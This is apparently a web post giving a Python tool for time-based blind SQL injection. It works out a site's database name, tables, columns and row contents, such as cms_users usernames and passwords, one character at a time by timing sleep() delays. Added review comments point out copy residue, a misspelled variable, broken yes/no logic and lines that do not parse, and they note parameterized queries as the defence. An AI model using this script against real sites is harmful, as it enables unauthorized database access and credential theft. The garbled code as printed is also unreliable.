SQL injection: a general-purpose Python script for time-based (delayed) blind injection

SQL injection: Python script for time-based (delayed) injection

import requests
import binascii
def judgment_delay(complete_url):
    """Send one GET to complete_url and report whether the reply was delayed.

    Returns "time out" when requests raises ReadTimeout under the 3-second
    timeout and "normal" when the request completes. The rest of the script
    uses this return value as its only signal.
    """
    # NOTE(review): the "<!-- -->" after the opening brace is markup residue
    # from the web page this listing was copied from, not Python; as printed
    # the block does not parse.
    # Every probe carries this same constant User-Agent, so the requests
    # differ only in the text appended to the URL.
    headers={<!-- -->
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
    }
    try:
        # The response body and status are discarded; only elapsed time is
        # observed. Any slow reply (busy server, lossy link) is therefore
        # indistinguishable from an injected delay, so one "time out" is weak
        # evidence on its own.
        requests.get(url=complete_url,headers=headers,timeout=3)
    except requests.exceptions.ReadTimeout:
        # Only ReadTimeout is handled; connection errors and connect timeouts
        # propagate to the caller.
        return "time out"
    else:
        return "normal"
def judgment_exploit(url):
    """Check once whether appending a sleep(6) condition delays the response.

    Prints a positive message when judgment_delay returns "time out";
    otherwise ends the whole process through exit().
    """
    # The requested delay (6 s) is longer than the 3 s read timeout used by
    # judgment_delay, so a delayed reply surfaces as a timeout.
    # An endpoint is only affected if it concatenates the parameter into its
    # SQL text; with a bound (parameterized) query the appended string is
    # treated as data and no delay occurs.
    payload=" and sleep(6) #"
    complete_url=url + payload
    num=judgment_delay(complete_url)
    # NOTE(review): a single sample decides the outcome, so a server that is
    # merely slow at that moment yields a false positive.
    if "time out" in num:
        print("[ + ] has a delay vulnerability")
    else:
        exit("[-] There is no delay vulnerability")

def content(url,need_boom,table_name):
    """Recover row values of the chosen columns one character at a time.

    url is the base URL the conditions are appended to, need_boom is the list
    of column names, and table_name is the table to read. Matched characters
    are printed, not returned; columns of one row are separated by ':'.

    Loop variables: j is the row offset (0..99), k the column, l the character
    position (1..99) and m the candidate code point (20..126). A "time out"
    from judgment_delay for a candidate is taken as a match.
    """
    # NOTE(review): the "<!-- -->" markers inside the f-string braces and the
    # space in "+ =" are residue from the web page this listing was copied
    # from; as printed the block does not parse.
    # Seen from the server, this produces long runs of near-identical requests
    # that differ only in the compared number (up to 107 per character), with
    # an occasional reply held for about five seconds. Binding the parameter
    # instead of concatenating it into the SQL text removes the behaviour.
    num=len(need_boom)
    for j in range(0,100):
        if j==0:
            print("[ + ] Explosive field content module started successfully")
            print("[ + ] My little brain is working very fast, please wait...")
        # flag: set once any character of this row matched; a row with no
        # match at all ends the outer loop.
        flag=0
        # mh: 1-based index of the column being processed, used to decide
        # whether a ':' separator is printed.
        mh=0
        for k in need_boom:
            print("------------------------------------------------ -------------------------------------------------- ---------------------------------------------")
            mh + =1
            for l in range(1,100):
                # flag1: set when a candidate matched at this position.
                flag1=0
                # Candidates start at 20, so code points 20-31 (control
                # characters) are tried before the printable range.
                for m in range(20,127):
                    # k and table_name are interpolated into the query text
                    # as-is, with no quoting or validation.
                    payload=f" and if(ascii(substr((select {<!-- -->k} from {<!-- -->table_name} limit {<!-- -->j},1), {<!-- -->l},1))={<!-- -->m},sleep(5),1)"
                    complete_url = url + payload
                    if judgment_delay(complete_url) == "time out":
                        print(chr(m), end="")
                        flag=1
                        flag1=1
                        break
                # NOTE(review): l never exceeds 99 inside range(1,100), so the
                # "l>100" branch and its exit() are unreachable.
                if flag1==0 and l>100:
                    exit("[ + ] Explosion is over. Thanks for using")
                elif flag1==0:
                    # No candidate matched: treated as the end of the value.
                    break
            if mh<num and flag==1:
                print(':',end="")
            print("------------------------------------------------ -------------------------------------------------- ----------------------------------")
        if flag == 0:
            break


def column_name(url,table_name,table):
    """List the column names of one table, then optionally read their rows.

    url is the base URL, table_name is the table identifier as it is placed
    into the query, and table is the plain table name that is handed on to
    content(). Column names are printed with a 1-based index and collected in
    column_name_list; nothing is returned.
    """
    # NOTE(review): the "<!-- -->" markers inside the f-string braces and the
    # space in "+ =" are residue from the web page this listing was copied
    # from; as printed the block does not parse.
    print("[ + ] Field name blasting module started successfully")
    print("[ + ] One Punch Man is charging....")
    column_name_list=[]
    for i in range(0, 100):
        # This local string shadows the function's own name inside the body.
        column_name = ""
        print(f"[{<!-- -->i + 1}]:", end="")
        # flag: set once any character of entry i matched; an entry with no
        # match ends the listing.
        flag = 0
        for j in range(1, 100):
            # flag1: set when a candidate matched at position j.
            flag1 = 0
            for k in range(20, 127):
                # table_name is inserted without quotes; the caller in this
                # file passes it as a 0x-prefixed hex literal. Filtering quote
                # characters in the request parameter would therefore not stop
                # this query, whereas binding the parameter does.
                payload = f" and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={<!-- -->table_name} limit {<!-- -->i}, 1),{<!-- -->j},1))={<!-- -->k},sleep(5),1) "
                complete_url = url + payload
                if judgment_delay(complete_url) == "time out":
                    print(chr(k), end="")
                    column_name + = chr(k)
                    flag1 = 1
                    flag=1
                    break
            if flag1 == 0:
                break
        if flag == 0:
            break
        column_name_list.append(column_name)
        print('\r')
    print("\r")
    # NOTE(review): `x == "y" or "Y"` is always truthy because the non-empty
    # string "Y" is evaluated on its own, so answering "n" still continues.
    if input("Whether you want to blast the content in the field (y/n):")=="y" or "Y" :
        num=int(input("Please enter the number of fields to be blasted:"))
        need_boom=[]
        for i in range(0,num):
            # The typed number is used as a 1-based index without a range
            # check; a non-numeric or out-of-range answer raises here.
            need_boom.append(column_name_list[int(input("Please enter the field number to be exploded:"))-1])
        table_name=table
        content(url,need_boom,table_name)

def table_name(url):
    """List the table names of the current database, then ask which to open.

    Names are printed with a 1-based index and collected in table_name_list.
    The chosen name is passed to column_name() both as a hex literal and in
    plain form. Nothing is returned.
    """
    # NOTE(review): the "<!-- -->" markers inside the f-string braces and the
    # space in "+ =" are residue from the web page this listing was copied
    # from; as printed the block does not parse.
    table_name_list=[]
    for i in range(0,100):
        # This local string shadows the function's own name inside the body.
        table_name=""
        print(f"[{<!-- -->i + 1}]:",end="")
        # flag: set once any character of entry i matched; an entry with no
        # match ends the listing.
        flag=0
        for j in range(1,100):
            # flag1: set when a candidate matched at position j.
            flag1=0
            for k in range(20,127):
                # Reads information_schema.tables restricted to database(),
                # i.e. whatever schema the application's connection uses.
                payload=f" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {<!-- -->i},1),{<!-- -->j} ,1))={<!-- -->k},sleep(5),1)"
                complete_url=url + payload
                if judgment_delay(complete_url) == "time out":
                    print(chr(k),end="")
                    table_name + =chr(k)
                    flag1=1
                    flag=1
                    break
            if flag1==0:
                break
        print('\r')
        if flag ==0:
            break
        table_name_list.append(table_name)
    # NOTE(review): `x == "y" or "Y"` is always truthy because the non-empty
    # string "Y" is evaluated on its own, so the else branch is unreachable.
    if input("Is the field to be exploded? (y/n):") == "y" or "Y":
        # The typed number is used as a 1-based index without a range check.
        table=table_name_list[int(input("Please enter the serial number of the field in which table you want to blast:"))-1]
        # Re-encodes the chosen name as "0x" followed by its hex bytes before
        # it is placed into the next query.
        table_name = "0x" + binascii.hexlify(table.encode()).decode()
        column_name(url,table_name,table)
    else:
        exit("good bey")


def database_name(url,length):
    """Recover the current database name, given its length, by timing.

    For each position 1..length, candidates 20..126 are compared against the
    character of database() at that position; the first candidate reported as
    "time out" is printed and appended. Then asks whether to list tables.
    """
    # NOTE(review): the "<!-- -->" markers inside the f-string braces, the
    # space in "+ =" and the print() split across two lines are residue from
    # the web page this listing was copied from; as printed the block does not
    # parse.
    print("[ + ] The pigeon is laying eggs...")
    # This local string shadows the function's own name inside the body.
    database_name=""
    print("[ + ] database name",end=":")
    for i in range(1,length + 1):
        for j in range(20,127):
            payload= f" and if(ascii(substr(database(),{<!-- -->i},1))={<!-- -->j},sleep(5),1) - - + "
            complete_url=url + payload
            # NOTE(review): conplete_url is never assigned in this listing, so
            # this line raises NameError before any request is sent; the
            # script's top-level handler reports that as an environment
            # problem.
            if "time out" in judgment_delay(conplete_url):
                database_name + =chr(j)
                print(chr(j),end="")
                break
    print('\\
')
    # NOTE(review): `x == "y" or "Y"` is always truthy because the non-empty
    # string "Y" is evaluated on its own, so the else branch is unreachable.
    if input("Should the table name be exploded? (y/n):") == "y" or "Y" :
        print("[ + ] The little brain is running fast...")
        table_name(url)
    else:
        exit("Thanks for using!")

def database_length ():
    """Entry point: read a URL, run the delay check, then find the name length.

    The URL is read interactively with input(). judgment_exploit() ends the
    process if its single check sees no delay. Lengths 1..999 are then tried
    in order and the first one reported as "time out" is kept.
    """
    # NOTE(review): the "<!-- -->" marker inside the f-string braces is residue
    # from the web page this listing was copied from; as printed the block
    # does not parse.
    # length stays 0 when no candidate matches, in which case the later
    # per-character loop in database_name() has nothing to iterate over.
    length=0
    url=input("Please enter url:")
    judgment_exploit(url)
    print("Calculating length...")
    for i in range(1,1000):
        payload=f" and if (length(database())={<!-- -->i},sleep(5),1)"
        complete_url=url + payload
        # NOTE(review): conplete_url is never assigned in this listing, so
        # this line raises NameError before any request is sent; the script's
        # top-level handler reports that as an environment problem.
        if "time out" in judgment_delay(conplete_url):
            length=i
            break
    print("[ + ] The length of the database name is:",length)
    # NOTE(review): `x == 'y' or 'Y'` is always truthy because the non-empty
    # string 'Y' is evaluated on its own, so the else branch is unreachable.
    if input("Do you want to explode the library name? (Y/N):") == 'y' or 'Y':
        database_name(url,length)
    else:
        exit()
# Banner and usage text, printed unconditionally when the module is run or
# imported.
# NOTE(review): the usage line shows the URL as a command-line argument, but
# nothing in this listing reads the command line; database_length() asks for
# the URL with input(). The example target in the usage line is a loopback
# address.
print("""
            _ _____ _ _ _ _ _ _
           | | | __ \ | | | | (_) (_) | | (_)
  ___ __ _| | | | | ___| | __ _ _ _ ___ __| | _ _ __ _ ___ ___| |_ _ ___ _ __
 / __|/ _` | | | | |/ _ \ |/ _` | | | |/ _ \/ _` | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
 \__ \ (_| | | | |__| | __/ | (_| | |_| | __/ (_| | | | | | | __/ (__| |_| | (_) | | | |
 |___/\__, |_| |_____/ \___|_|\__,_|\__, |\___|\__,_| |_|_| |_| |\ \___|\___|\__|_|\___/|_| |_|
         | | __/ | _/ |
         |_| |___/ |__/
                                                                                                                ---xl
        Delayed injection script
        Instructions 
        python3 delay_injection.py http://127.0.0.1:8080/Less-1/?id
        help:
            url=http://ip/cms/show.php?id=33
""")
# l=["username","password"]
# content(url="http://10.9.47.77/cms/show.php?id=33", need_boom=l,table_name='cms_users')

# Runs the interactive chain (length -> name -> tables -> columns -> rows) and
# maps a few exception types to exit messages.
try:
    database_length()
except requests.exceptions.MissingSchema:
    # Raised by requests when the entered URL has no scheme such as http://.
    exit("[-] Startup failed, please check whether the url is correct")
except NameError:
    # NOTE(review): this also catches any undefined name inside the script's
    # own functions and reports it as an environment problem, which hides
    # programming errors.
    exit("[-] Startup failed, please check whether the environment is correct")
except KeyboardInterrupt:
    exit("[-] User ends script")
# NOTE(review): "exceptException:" is not valid Python as printed; the keyword
# and the class name have run together in this copy of the listing.
exceptException:
    exit("[-] User operation error")

Effect: